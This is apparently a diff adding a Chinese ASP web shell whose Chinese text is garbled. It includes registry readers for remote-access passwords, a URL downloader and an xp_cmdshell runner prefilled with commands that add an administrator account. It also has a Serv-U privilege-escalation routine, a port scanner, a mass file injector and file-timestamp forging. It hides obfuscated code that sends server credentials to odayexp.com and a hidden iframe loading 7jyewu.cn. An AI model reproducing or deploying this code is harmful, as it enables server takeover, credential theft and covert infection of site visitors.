nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
